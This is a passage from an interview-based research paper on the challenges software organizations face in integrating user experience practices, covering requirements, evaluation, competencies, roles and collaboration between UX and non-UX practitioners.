than they have in reality but it is too expensive today, ....that ruins the business case for that customer’’ (e.g., b- /se). we observed some inconsistencies in practitioners’ views concerning user involvement. in favor of involving users an interviewee stated: ‘‘maybe you want to have the end user involved also with the developers so that developers understand what they are doing, instead of just following the specifications. i think that would be very very valuable.’’ (a- /se). on the other hand, a project manager stated that involving users in requirements discussions increases the costs of the projects. therefore, it is better to negotiate requirements and sign a contract without involving the users. regarding this an interviewee stated: ‘‘[they] think they can say anything during the [requirement] workshop and then get it. it is not the case... so it leads to lots of long long long discussions afterwards.’’ (b- /se). as another example: ‘‘it usually leads to features that you take on more than what you agreed from the beginning. so it’s possible that the customer gets a better system but they still don’t pay you more money for this.’’ (b- /se). one developer stated that they often have less access to the end users, which can be problematic for their work mainly because this means developers do not often understand the rationale for the requirements: ‘‘developers don’t get the motivation behind the requirements because that gets lost during the way. so, the marketing people say that we must have this requirement, and interaction designers say we must do it this way, so you have the ‘what’ and the ‘how’ but you never get the ‘why’.’’ (a- /se). some practitioners emphasized that relying too much on the end users’ opinions might lead to less creativity in the design work: ‘‘we have a quote sitting on the wall here, it’s from henry ford [that says] ‘if i had asked people what they wanted, they would have said a faster horse’.’’ (h- /hci). theme . focus on evaluating functionality and usability, not ux we also identified a number of challenges regarding evaluation of ux in the studied organizations (see fig. ). our data shows that in general, our selected organizations mainly focus on testing functionality. in addition, similar to the previous theme on requirements, the interviewees highlighted that limited involvement of the end users in projects is a challenge to evaluating ux, especially since evaluating ux requires gathering users subjective perception of the software. we observed that practitioners with technical backgrounds are often unfamiliar with how their organizations handle ux or even usability testing. they also showed limited knowledge as to why such evaluations can contribute to the success of the software. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. theme : focus on evaluating functionality & usability, not ux ux evaluation is more difficult because of its holistic nature & broad scope practitioners focus more on testing functionality situatedness of ux makes it difficult to evaluate practitioners find it more difficult to evaluate ux than usability or other quality characteristics temporality of ux makes it difficult to evaluate limited resources are assigned to ux evaluation although it requires more resources practitioners find it difficult to evaluate non- task-related/hedonic aspect of software practitioners have limited access to tools & methods for evaluating ux includes it is difficult to involve users to evaluate ux, in particular its subjective elements technical stakeholders lack knowledge on the value of ux evaluation technical stakeholders lack knowledge on how ux evaluation is performed ux evaluation is often replaced by usability testing ux evaluation is performed informally so may not result in reliable results practitioners require more complete prototypes to evaluate ux figure challenges concerning testing and evaluation (theme ). full-size doi: . /peerjcs. /fig- generally speaking, ux evaluation is immature in the studied organizations. in projects with limited time or budget, ux evaluation is either non-existent or rare, especially when compared to other testing activities: ‘‘we have done much functional testing of course, system tests etc., but end user testing we have not performed much i’d say.’’ (a- /hci). in some organizations, ux evaluation is basically replaced by usability testing. regarding this, one interviewee stated: ‘‘i think user tests tend to be more focused on pure usability. i guess it’s when you’re releasing the product into the wild, that’s when you start to get maybe the most valuable feedback or the most truthful ones.’’ (a- /hci). according to these practitioners, usability testing is not enough to evaluate the whole ux of the software. regarding this, a ux practitioner stated: ‘‘when you evaluate usability, it’s when you go into the nitty gritty details, and try to look at efficiency within the user interface. my personal view is that that is not that relevant. i mean it’s relevant but not in what we do [i.e., ux].’’ (h- /hci). to compensate for limited formal ux evaluations, some practitioners gather informal qualitative user feedback after release, for instance through comments in the app store or on social media. according to the practitioners we spoke with, ux evaluation is limited because it is difficult compared to evaluating usability or other quality characteristics. some practitioners kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. related this difficulty to the fact that ux involves emotions, and non-task-related user needs (i.e., be-goals), and that limited tools and methods exist to support addressing these needs in evaluations. emotion can be even impossible to measure using current quantitative approaches, as one of the practitioners stated: ‘‘it is difficult to sort out or really get the correct feeling that the user has because they will try to explain it but it perhaps is not the real emotion that we catch at the end. if we had a method or approach to really get these from the user that would be great.’’ (a- /hci). similarly, one interviewee said: ‘‘some goals are more difficult to measure than others, e.g., if this is a feeling thing: ‘i should be very well informed’, but mostly you can measure [them] in the usage test through observations and interviews’’ (e- /hci). this practitioner further emphasized that they can specify quantitative measures for ux-related requirements (e.g., ‘‘ out of users should succeed, and they should be content’’), but also need to observe users in order to gain better understanding of the experience: ‘‘can the users perform the tasks? how do they perform the tasks? how do they feel afterwards? are they content?’’ (e- /hci). this interviewee further emphasized that to measure feelings of users they need ‘a rather complete prototype’. practitioners highlighted that despite importance of involving the end users in ux evaluations, it is difficult to access them: ‘‘i think we should involve the end users a lot more but it is a political issue, the project needs to convince the customer that this is necessary.’’ (a- /hci). some of the interviewees related the difficulty in ux evaluation to the holistic nature of ux. discussing cases where practitioners take a holistic approach to ux, one interviewee stated: ‘‘how would you measure that sort of holistic experience throughout the process of designing it? because, of course you cannot [implement or design] everything at the same time, and you know there are so many dependencies. how do you straighten those out and how do you understand what you’re measuring and not measuring?’’ (h- /hci). this interviewee further emphasized that the broader scope of ux negatively impacts evaluations: ‘‘evaluation is a problem of course, cause user experience is much broader in scope than usability, it’s more difficult to evaluate also. like the phone example that i gave you before, how do you pick up on the fact that someone has experienced the competition unless you ask for it? can you count on what a person would actually say about their experience? what if the person doesn’t say anything? that’s a problem, of course, because ux is much broader in scope, and if you have a wider scope on it, then you have a much more difficult task to actually frame it in an evaluation phase.’’ (h- /hci). some practitioners related the difficulty in ux evaluation to the fact that users’ expectations and their perception of a product change over time and are affected by various factors; e.g., introduction of new technologies or appearance of a competing product. one of the interviewees highlighted: ‘‘it’s like when you try on new clothes. the shirt you were wearing going into the dressing room and looked fine, looks shabby when you’ve tried out the new shirt.’’ (h- /hci). the interviewee used this analogy to explain the subjective and dynamic nature of expectations, and that for each individual a new experience can affect the user’s perception of other products. another problem concerns difficulties in relating the result of laboratory evaluations to the real experience of users, and the role of context in forming experiences: ‘‘i think user tests tend to be more focused on pure usability. i guess it’s when you’re releasing kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. theme : lack of consensus on ux related competencies & responsibilities there is a lack of practitioners with multidisciplinary competencies needed to handle ux there is a lack of consensus on how the diverse ux responsibilities should be assigned in projects organisations lack competencies for eliciting, refining & communicating be-goals or non-task- related needs ux practitioners often fail to gain & control an overall view on ux design, specially in agile settings a diverse set of competencies is required for better ux work includes ux responsibilities are not well-defined in organziations ux responsibilities are negatively impacted by limited resources & low management support figure challenges concerning ux-related competencies and responsibilities (theme ). full-size doi: . /peerjcs. /fig- the product into the wild, that’s when you start to get maybe the most valuable feedback or the most truthful ones. so it’s often good to make some sort of what we call a beta product and publish it. let people interact with it. but that’s a luxury also because that takes time. often, in many, many cases, you have to just make something work. in an ideal world you should have a testing phase, of course. to get the users’ perspective. that should be really nice to have.’’ (a- /hci). another problem concerns the relation between different episodes of experience, for instance first impression of users and ux after using the software for a while: ‘‘it’s a fantastic feeling to sit in a brand-new car in a car shop. how do you feel about the same car if you’ve had it for a year, driving it around with two kids in the backseat, for instance? experiencing all of the quirks from the interior, and all the things that don’t work, the stupid things that make your hands go dirty every time you’re supposed to close a door, for instance? that’s part of user experience design. so it’s a very floating scale.’’ (h- /hci). theme . lack of consensus on ux-related competencies and responsibilities another group of challenges concerns the competencies and responsibilities required to perform ux practices (see fig. ). our data shows that for better ux work, organizations need to have access to a variety of competencies including brand management, visual design, usability engineering, interaction design, and emotional design. in particular, to be able to address the hedonic aspect of ux, it is crucial to have access to competencies for eliciting, refining, communicating, and testing be-goals or non-task-related needs of users. a group of interviewees believed that due to the wide spectrum of ux competencies, it is unlikely to find all of those competencies in any individual practitioner. this group therefore argued that all of the team members (with complementary competencies) should jointly take on the ux responsibilities. regarding this, one of the practitioners said: ‘‘i’m not sure if that should be a specific role [...] so everybody should have a ux focus now. i’m not sure if we can have some sort of ux guy [who takes the final decisions].’’ (a- /hci). this interviewee further emphasized that achieving a better ux requires a ‘ux-mindset’ that kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. even the technical roles in the projects (e.g., programmers) should have. on the other hand, a group of interviewees believed there is a need for specific practitioners with these multidisciplinary competencies because these competencies are tightly connected and hard to separate. this group therefore argued for defining specific ux-related roles and responsibilities in projects. regarding the importance of access to individuals with diverse competencies, an interviewee stated: ‘‘i, as an art director, have to have somewhat deep knowledge about ux, and also ixd ...you can’t separate them.’’ (a- /hci). another interviewee said: ‘‘you have to be knowledgeable in many areas. you have to be very holistic in the way you think about things, cause you have to speak with programmers in the language of programmers, to some extent, at least, to gain their respect, but also you have to be treated as an equal...you also have to understand business, and that side of software. you have to be a little bit of everything but you also have to be a specialist in your own domain so it’s kind of like a juggling act.’’ (h- /hci). being able to gain an overall view of ux design was one of the concerns highlighted in the interviews. according to the practitioners, this is often a difficult yet important prerequisite for creating a coherent ux. as the interviewees stated, to deal with the complexity of today’s systems, the common approach in the software community is to break down the whole system into various sub-systems and work on them independently. such an approach can harm the ux of the software since often in these cases ux practitioners lose the overall view on the ux design, how these different sub-systems fit together as a whole, and how they individually and in combination contribute to the experience of the end users. regarding this, one interviewee emphasized: ‘‘you have to tear it down, yeah! but what happens to the whole? who is going to define the whole?’’ (e- /hci). the interviewees also highlighted that in agile settings, the decision-making process is spread out both over time as well as among the team members. this further complicates the process of creating a unified and coherent ux design (e.g., h- /hci). further, agile processes enforce a focus on a few piece(s) of the design at each iteration. regarding this, one interviewee said: ‘‘you need to deliver wireframes for parts of the application but you still do not know how it all will fit together at the end.’’ (a- /hci). similar to what we saw for competencies, our data shows that responsibilities of ux practitioners are also very diverse. as some ux practitioners expressed, they have varying responsibilities in and contributions to different projects; this depends on factors such as management support, available resources, and timing. in one organization (c), the ux team is responsible for handling requirements and feeding them to the development teams. in another organization (g), the ux group is part of r&d where the group mainly focuses on future products, and long-term vision of the company. one ux practitioner from company g described her responsibilities as: ‘‘that can loosely be described as discovery, research, overall strategy, and then high-level design.’’ (g- /hci). in another organization (h), since the number of practitioners with ux knowledge is low, none of these practitioners are part of any particular project teams, and are instead shared resources among projects. ux practitioners are also often responsible for spreading knowledge and awareness about ux in the organization, or giving support to development teams concerning ux matters. regarding this, a practitioner expressed: ‘‘i think on a very high level, our responsibility is to kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. theme : communication & collaboration gap between ux & non-ux practitioners ux perspective may get lost in later development phases ux work is more visible throughout the process than usability work ux-related decisions are postponed in projects, specially in agile settings some stakeholders believe ux can be improved through minor changes to the gui in later development phases power struggles rise between ux & non- ux practitioners non-ux practitioners lack trust in ux practitioners since the ux field is relatively young ux practitioners get involved in projects late there may be a communication & collaboration gap between ux and non-ux practitioners includes figure challenges concerning communication and collaboration between ux and non-ux practitioners (theme ). full-size doi: . /peerjcs. /fig- inform, influence and inspire.’’ (h- /hci). he further stated: ‘‘we contribute to the process by running workshops, by providing provocative questions, or providing examples, engaging in discussions in which people from other domains dig down really deep into their own layers of knowledge, and we can ask really simple questions to poke them with our perspective.’’ (h- /hci). theme . communication and collaboration gap between ux and non-ux practitioners this theme of challenges concerns how ux and non-ux practitioners communicate with each other and collaborate in projects (see fig. ). the interviewees generally agreed that better ux work requires early involvement of ux practitioners in projects. early involvement helps ux practitioners get first-hand information about the customer and the end users. in addition, practitioners get a chance to negotiate trade-offs between the design solutions and technical constraints. if required, a design concept can then be updated based on the developers’ feedback. nevertheless, ux practitioners often are involved in projects only in later stages. regarding this a practitioner stated: ‘‘the worst case is when someone has met a client and talked a lot about the software, then i meet this guy who has met the client ... then it’s secondhand information and everything gets distorted.’’ (a- /hci). early involvement is in particular important since in later stages it is difficult or even impossible to make effective changes to the ux design. as an interviewee stated: ‘‘on the personal level developers can be offended if someone thinks it’s not a good solution, they can have a hard time killing their darlings, they could have been thinking of it as a very beautiful kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. solution they have made with , lines of code, so they don’t want to throw it away.’’ (h- /hci). some stakeholders however believe that ux can be improved with just minor gui changes in later stages of development, they therefore down-prioritize ux practices in earlier stages. the interviewees also highlighted that agile processes have a limited focus on strategic decisions such as the overall ux of the software. often these strategic decisions are either ‘skipped’ or postponed since agile methodologies tend to prioritize immediate and current problem solving: ‘‘agile is a lot about problem solving and that’s what sort of gets priority.’’ (h- /hci). according to the interviewees, even in cases when ux practitioners are involved in early phases, they may lose their connection to the project in later phases. to overcome this problem, the practitioners proposed various solutions. one interviewee, for instance, stated that they rely on ux advocates in projects: ‘‘we are not ux experts that you hire if you want to give a problem to somebody, have them go away for three months, and then have them come back with the solution... if something needs to go into production after our principal work is finished, you need somebody who’s going to be involved in that process and involved from the very beginning. so we have a very strong focus on collaboration...oftentimes, at least when it comes to transitioning into a production environment, we’re looking for ux savvy development managers or developers.’’ (g- /hci). another ux practitioner told us that throughout their projects, they continuously check the status of the ux design: ‘‘we try to have always at least one person who was part of the original dialog present during the weekly checkups, and basically just going by the desks and checking, informally.’’ (a- /hci). ux practitioners need to be involved in projects early on, and need to have an active role throughout the projects which, in our interviewees’ view, can lead to power struggles between ux and non-ux practitioners: ‘‘sometime it can be perceived as we’re trying to take control of the situation.’’ (h- /hci). this interviewee further emphasized this often means that working with ux is more difficult than usability: ‘‘i think the reason why it was easier to work with usability to some extent was that you didn’t take up any space. it was like being a woman in the early th century. you were there, but you didn’t vote, you didn’t do anything.’’ (h- /hci). similarly another interviewee said: ‘‘there are a lot of strong stakeholders that are really interested in doing those kind of things, programmers for instance, who like to be in control.’’ (a- /hci). power struggles between ux and non-ux practitioners were also attributed to different motivations of practitioners (e.g., a developer wanting to develop more efficient code vs. a designer wanting to create a better design). regarding this, a ux practitioners emphasized: ‘‘everyone wants to start with their own domain, as soon as possible, from day one. then, of course, you have the problem of ownership of the direction, where to go and what to do and why. that’s something that we struggle with quite a bit.’’ (e- /hci). similarly, another interviewee said: ‘‘i think there is an ongoing struggle, cause we all have different drivers; like my driver is always about making technology that is interesting, useful, and brings some sort of value to the users in the context in which it is being used.’’ (h- /hci). this interviewee further emphasized the situation has changed in their work as they moved from usability towards ux in recent years: ‘‘compared to when we only worked with usability, i would argue that the situation is rather different, and part of it has to do with, being part of the kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. early phases, but i think the biggest challenge and the biggest struggle nowadays is really the ownership of decision making, and who calls the shots ...because usability didn’t disturb the big process, the big decision-making, the prioritization of what to do, or what constituted a feature that was needed to be implemented. usability wasn’t part of that discussion. usability was always part of like, how you should make a font, or the colors, like lipstick on the pig!’’ (h- /hci). better ux work requires regular communication and collaboration among ux and non-ux practitioners which sometimes can be challenging since these two groups of practitioners often have different responsibilities, education, motivation, and constraints in their work. regarding the importance of communicating with designers a developer stated: ‘‘i think we need to be working tighter with the design department to help them know what can be done.’’ (d- /se). similarly, a ux practitioner said: ‘‘we really try to make this give and take ...we have constant communication, and i will say that we get always input from developers that we need to consider.’’ (a- /hci). according to the ux practitioners, if they are disconnected from the technical roles, e.g., developers, they may not be aware of technological constraints when choosing and developing a design concept: ‘‘honestly the further we are away from the people that actually build the stuff, we run the real risk of becoming hand waving idiots.’’ (g- /hci). another ux practitioner stated: ‘‘i realized quite early in my career that i have to communicate with these guys who program or develop something, and i have to understand what they’re saying.’’ (a- /hci). the interviewees however emphasized that overcoming this communication gap should be a two-way effort: ‘‘i’m not saying that we should be the only ones with this kind of multidisciplinary approach. i think the other ones should also have that, that’s a big challenge, i would say.’’ (h- /hci). similarly, another practitioner said: ‘‘so i have to have some sort of knowledge about the technology because i have to know what my limitations are .... i have to have some sort of technical know-how so i can communicate with developers. i expect the same from them. so they realize that the aesthetic choice has to be made and it can take time.’’ (a- /hci). according to the practitioners, in order to facilitate a better communication, ux practitioners need to acquire basic knowledge about various technical topics., e.g., programming, testing, architecture etc. as emphasized by one respondent: ‘‘you have to be like knowledgeable in many areas...you have to be very holistic in the way you think about things, cause you have to speak with programmers in the language of programmers, to some extent...you also have to understand the business.’’ (h- /hci). similarly, another practitioner stated: ‘‘you have to speak in an engineering language. that’s a real challenge for ux work, because you always have to translate it to terms that makes sense to an engineer or economist.’’ (a- /hci). the respondents also emphasized that communication between ux and non-ux practitioners can be challenging because of lack of trust in ux practitioners. regarding this, one interviewee emphasized: ‘‘we have had problems with some of the developers sometimes. it has been a bit of conflict. i think we have some work to do to really get a ‘we-feeling’ that we, together, are developing an awesome product.’’ (c- /hci). one practitioner attributed this lack of trust to the fact that the field of ux is a relatively new field and less established kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. compared to the technical fields, e.g., se. this also means that ux practitioners are often younger and less experienced than non-ux practitioners: ‘‘most ux practitioners are quite young still, i do not think they have been that long in the market for development of their competencies yet.’’ (a- /se). one ux practitioner emphasized that they can gain more trust over time and as they accomplish more in their work: ‘‘[over time] we are adding on the pile of what we would call successful things we have done, and of course that gives us a bit more ‘trust’ i could say.’’ (h- /hci). discussion in this section, we answer the research questions and describe the implications of our findings for research and practice. we use hassenzahl’s model of ux and his proposed list of ux characteristics as an analytical lens to investigate the challenges in greater detail. in answer to rq (what challenges do practitioners face when integrating ux practices into software development processes and organizations?), we found themes of challenges as depicted in fig. . some of these themes are more fundamental and concern the views, attitudes and knowledge of stakeholders (theme , theme , theme , and theme ) while some others are more tactical (theme , theme , theme , and theme ). there is clearly a multifaceted and complex set of relations between the themes. these interrelations are discussed here to the extent supported by our data. more empirical data should be gathered in the future to elaborate and validate these connections. at a high level, the more fundamental themes can explain the tactical themes. a limited knowledge of ux (theme ) is likely also connected with the low impact of ux models in industry (theme ). in addition, a lack of common reference and knowledge base can lead to language gap, meaning that the concepts of ux and ux practices can mean different things to different people. this gap may contribute to communication problems within software development organizations (theme ). through a lopsided emphasis on functionality and actual quality characteristics (theme ), we can explain the identified challenges concerning ux-related requirements (theme ) and testing (theme ). requirements and testing challenges can also be attributed to limited tools, methods and competencies, and communication issues (theme , theme , and theme ). even if companies intend to focus more on ux, they do not always have the capability (e.g., competencies) to turn this intention into action. moreover, even if ux practitioners with the right competencies are present in an organization, they often face power struggles and lack of trust therefore fail to effectively communicate and collaborate with non-ux practitioners. in answer to rq (how do ux challenges relate to challenges of handling software quality characteristics, in particular usability? ), we found that there are in fact various overlaps between the identified themes and challenges reported for handling usability and/or software quality characteristics in general. however, despite similarities at a superficial level, we differentiate the challenges through the characteristics of ux: subjective, holistic, context-dependent, temporal and worthwhile. in particular, through these characteristics, we highlight the inherent differences between ux and other quality characteristics, including kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. usability, and explain the lopsided focus of the software industry on usability and the pragmatic aspect of ux. while previous empirical studies report that usability is not understood properly, especially among technical stakeholders (e.g., bak et al., ) we observed that in the studied organizations practitioners have fair knowledge and awareness about usability. this can be an indication that industrial knowledge and awareness of usability is improving. in the case of ux, the same level of maturity however is not yet achieved in industry and organizations struggle with knowledge and awareness concerning (i) the concept of ux and how it differs from usability, (ii) the potential of ux, in particular its hedonic aspect to add value to software, (iii) existing ux theories, tools and methods, and how to apply them in current development processes, (iv) competencies required for ux work, (v) handling ux-related responsibilities, and (vi) handling communication and collaboration among ux and non-ux practitioners. previous research shows that usability and purpose of use often dominate over ux in the software industry (väänänen-vainio-mattila, roto & hassenzahl, ; kuusinen & väänänen-vainio-mattila, ). however, an explanation for why this is the case is missing in the current body of knowledge. we observed a similar trend in the studied organizations. we additionally found explanations for this lopsided focus by investigating how the characteristics of ux impact day-to-day work of practitioners. these characteristics were in fact also highlighted by the interviewees when describing the challenges or discussing their work with ux mainly in comparison to usability. some examples of the interviewees’ quotations in relation to these characteristics are shown in table . it is not surprising that these characteristics were pointed out only by those interviewees who have knowledge and experience on ux. below, we clarify how our practitioners experience the implications of these characteristics in their work with ux (see table for a summary). in total, we identified such difficulties that mainly concern requirements and testing activities in software development. as shown in table , of these implications have been previously reported in literature. however, to the best of our knowledge, the remaining nine implications are unique to our study. clearly, our study did not focus on identifying these implications. further research is needed to provide a more comprehensive understanding of them, and their interconnections. the holistic nature of ux requires addressing not only do-goals but also be-goals. practitioners however believe that eliciting be-goals and translating them into requirements and design solutions is more difficult than for functionality or other quality characteristics. one explanation may be that practitioners disagree on whether they should identify and refine these be-goals in parallel, before or after other do-goals, including functionality. another explanation may be that these practitioners have limited access to guidelines, tools and methods for treating be-goals in their word. previous research (law, van schaik & roto, ) emphasizes that still limited practical guidelines exist on how to choose suitable ux measures and metrics for ux underlying elements, and interpret their findings to improve the overall ux. we additionally found that this challenge also negatively impacts requirements and design. ux requirements, design and evaluation methods are still developing. methods such as emocards kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table ux characteristic and their implications for the identified challenges as supported by our data. characteristic sample quotes regarding challenges subjective ‘‘it is difficult to sort out or really get the correct feeling that the user has because they will try to explain it but it perhaps is not the real emotion that we catch at the end, if it would be a method or approach to really get these from the user that would be great.’’ (a- /hci) holistic ‘‘functional requirements are easy to create, to merge into a design; more emotional things are more difficult.’’ (f- /hci) dynamic ‘‘it’s a fantastic feeling to sit in a brand-new car in a car shop. how do you feel about the same car if you’ve had it for a year, driving it around with two kids in the backseat, for instance? experiencing all of the quirks from the interior, and all the things that don’t work, the stupid things that make your hands go dirty every time you’re supposed to close a door, for in- stance? that’s part of user experience design. so it’s a very floating scale.’’ (h- /hci) context-dependent ‘‘i think user tests tend to be more focused on pure usability. i guess it’s when you’re releasing the product into the wild, that’s when you start to get maybe the most valuable feedback or the most truthful ones. so it’s often good to make some sort of what we call a beta product and publish it. let people interact with it. but that’s a luxury also because that takes time. often, in many, many cases, you have to just make something work. in an ideal world you should have a testing phase, of course. to get the users’ perspective. that should be really nice to have.’’ (a- /hci) worthwhile ‘‘if i start with ‘how’, i will never get to the ‘why’. if i start with ‘what’, with just making things, i will totally miss every im- portant point there is. for me it tends to be very, very useful to focus on the why. so if i can sort of see this why, even if it’s very, very unclear, i can sort of approach this ‘how’ and ‘what’ in a much better way. (g- /hci) table in relation to the characteristics of ux, we identified the above implications. these implications can explain the extra difficulties that practitioners face in their work with ux compared to other quality characteristics, including usability. ux characteristics implications (i.e., extra difficulties) as perceived by practitioners • ux relies on human subjective perception • ux is temporal and there is a complex relation between various episodes of experience • ux emerges from complexly intertwined underlying elements • ux includes both hedonic (be-goals) and pragmatic (do-goals) aspects • ux is unique and situated in the context • ux is worthwhile, about adding value, and more than just preventing problems and frustrations • ux work is perceived to be morea visible in the development process than usability work (our finding) • abstract ux-related needs (e.g., be-goals or emotional needs) are difficult to refine and translate into more concrete ones (our finding) • it is hard to translate abstract ux-related needs to concrete design solutions (our finding) • it is hard to frame ux in evaluations because of all the complex underlying dependencies between its elements (our finding) • there is a lack of consensus among practitioners on whether abstract ux-related needs should be elicited before, after or in parallel with other needs (our finding) • translating abstract ux-related needs (in particular for the hedonic aspect) to measurable requirements is perceived to be more difficult than for functionalities or other quality characteristics (our finding) • compared to the case of usability, more power struggles, and disagreements are perceived to rise between ux and non-ux practitioners (our findings) • it is perceived to be more difficult to decide between design alternatives and resolve power struggles and disagreements that can arise between ux and non-ux practitioners (our findings) • requirements related to the hedonic aspect of ux are either neglected or treated informally (our findings) • ux-related needs of users are abstract concepts (literature, our finding) • practitioners do not have access to standardized and agreed upon set of ux measures and metrics (literature, our finding) • field studies are crucial in ux work, in particular to gather authentic user experiences but are perceived to be more resource demanding (literature, our findings) • creating and using more sophisticated prototypes are vital in ux evaluations but are perceived to require more resources (literature, our finding) • practitioners are skeptical about effectiveness and reliability of current ux evaluation methods (literature, our finding) • practitioners do not always have access to enough users (literature, our finding) • practitioners do not always have access to sophisticated prototypes in earlier phases (literature, our finding) • practitioners do not often know how to measure the whole ux in relation to its underlying elements (literature, our finding) • users’ memory of their experience is prone to fabrication and fading (literature, our finding) • a deeper understanding of the relation between ux and time is missing (literature, our finding) • a deeper understanding of the relation between ux and memory is missing (literature, our finding) notes. aadmittedly, we are not drawing any quantitative conclusion from our qualitative data. here, we merely aim to emphasize the interviewees’ perception of different issues. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (desmet, overbeeke & tax, ) for gathering users’ momentary emotions about the interaction and ux curve (kujala et al., ) for long-term ux evaluation have been introduced but they are not widely accepted in industrial software development. we therefore highlight a need for more research on developing industry-relevant guidelines, tools and methods for identifying and selecting underlying hedonic and pragmatic elements of ux not only for measurement purposes but also for requirements and design activities. practitioners were also generally skeptical about the ability to address the subjective nature of ux in evaluations. for instance, our interviewees were concerned that what a user remembers about his or her emotions and shares in interviews or observations may not reflect the reality. our interviewee’s concern confirms the findings of law, van schaik & roto ( ). practitioners believed that the most truthful data about experience and perception of users can only be gathered in the field, and through using a functional version of the product in a real situation. however, field studies are too resource demanding (vermeeren et al., ) and not feasible in all projects. we additionally found that despite skepticism about interviews and observations, these methods are common in industry. moreover, organizations often resist introducing more novel tools and methods for various reasons including the cost of these tools and methods, or lack of knowledge and awareness about their value. in addition, our interviewees found it difficult to evaluate ux because of its subjectivity. they emphasize that while there is a great need to involve the end users in evaluations, accessing them in projects is often rare. limited access to the end users is a known and persistent problem in the industry (bak et al., ). however, we argue that compared to usability work, ux work is, to a larger extent, impacted by this limitation. according to the current studies, to reduce the impact of subjectivity on evaluations and to generate less biased and more reliable results (i) more users need to be involved in evaluations for statistical significance (law, van schaik & roto, ), and (ii) other stakeholders (e.g., developers) cannot act as substitutes for users in evaluations because they are biased towards the software being developed by their organizations (locascio et al., ). on the other hand, the limitations of access to end users and competencies can be easier to overcome in the case of usability through involving limited number of users (e.g., involving five users in usability tests (nielsen, )) or using internal stakeholders as test subjects (locascio et al., ). also, our interviewees found it difficult to evaluate subjective and holistic experiences of users because access to functioning or complete prototypes is often rare in earlier phases of projects. one solution is to apply evaluation tools and methods that do not require functioning or complete prototypes but rely on practitioners’ imagination of how users may perceive the design, which is however an open research topic (vermeeren et al., ). we also saw practical difficulties concerning handling the relation between different episodes of experience. it is important to take this relation into account in evaluations because of the dynamic nature of ux. the practitioners lacked knowledge and expertise on finding a balance between short- and long-term experiences in both design and evaluation. hence, we agree with law, van schaik & roto ( ) that the community still lacks enough understanding of the relation between ux, time and memory (the kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implications of the subjective and dynamic nature of ux), and suitable ux metrics and measures that can support this relation are lacking. the ux practitioners brought up the worthwhile (i.e., positive) nature of ux mainly when discussing their approach to requirements and design. the ux practitioners believed this aspect of experience (i.e., the value) or the ‘why’ behind developing the software for the end users, should be identified before the ‘how’ and ‘what’ that is connected to usability and functionality. nevertheless, this view is often in conflict with traditional and common approaches to software development that focus on identifying functionality or other quality characteristics (chung et al., ). the practitioners also pointed to the worthwhile nature of ux when describing their way of working and priorities. while the ux practitioners emphasize the software value from both the user and business perspective, non-ux practitioners often tend to merely focus on the business perspective which can create tensions between ux and non-ux practitioners. in particular, since practitioners still do not have enough knowledge, or tools and methods to make informed trade-offs between these two perspectives. for instance, to deliver a certain experience, ux practitioners may suggest one design solution to support specific user needs, but business stakeholders may suggest another solution to support specific business goals. while previous empirical studies report limited access to usability professionals (e.g., bak et al., ), the organizations we studied seem to have enough access to usability competencies which may indicate a general improvement of usability work in the industry. however, these organizations suffer from limited access to ux competencies, in particular concerning the hedonic aspect of ux and addressing various be-goals. to overcome the lack of ux and usability competencies, current research suggests simplifying well-known testing methods and training developers to perform them (oevad & larsen, ). while this approach is shown to be useful in the case of usability and the pragmatic aspect of ux (locascio et al., ; oevad & larsen, ), this is not necessarily the case for the hedonic and more subjective aspect of ux. for instance, as mentioned before, developers’ bias is shown to compromise the validity of testing results because developers are loyal to the products they develop and their organizations (locascio et al., ). in the studied organizations, the responsibilities of usability professionals are well understood and defined while there are uncertainties concerning the ux-related responsibilities. in addition, our interviewees perceive that power struggles appear more often and are more difficult to resolve for ux than for usability. previous studies report power struggles between developers and designers as a challenge to ux and usability work (chamberlain, sharp & maiden, ) but do not give explanations for why this is the case. here, we give more empirical support for this challenge, and additionally provide explanations for it. one explanation can be that ux responsibilities are diverse and can overlap the work of non-ux practitioners such as business and requirements analysts. another explanation is that all stakeholders experience different products and services on a day-to-day basis. therefore, non-ux practitioners can easily have opinions about what experiences the software should deliver, and how they should be delivered, i.e., through which design kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. solutions. this can lead to power struggles even in cases when there is no overlap between ux and non-ux responsibilities. another explanation may be that ux practitioners should be involved early on and throughout projects, and their responsibilities involve strategic decision making hence the work of ux practitioners is more visible in projects as our interviewees emphasized. the practitioners believed they can partially overcome the power struggles by increasing ux knowledge and awareness in organizations, and informing other stakeholders about ux responsibilities (what, why and how of ux practices), especially in relation to the overall strategies of the organization. in contrast to what we discussed above for ux, practitioners can test other software quality characteristics in labs, and even without necessarily using a sophisticated prototype of the software or even involving the end users. for example, usability can be tested on simple paper prototypes, using heuristic or other expert evaluations, or performance problems can be minimized through the use of software performance prediction approaches in earlier phases (balsamo et al., ). in the case of other software quality characteristics, the focus is on actual measures and values not the users’ subjective perception of these values. additionally, in contrast to ux, other quality characteristics are not dependent on time. for instance, performance or security measurements will have the same results even when repeated over time, provided that the software, and the test context (e.g., cpu load) have not changed. in other words, the difficulties we discussed above concerning requirements and testing of ux are either less severe or not even present for other quality characteristics, making their practice less challenging as perceived by our participants. limited access to the end users and 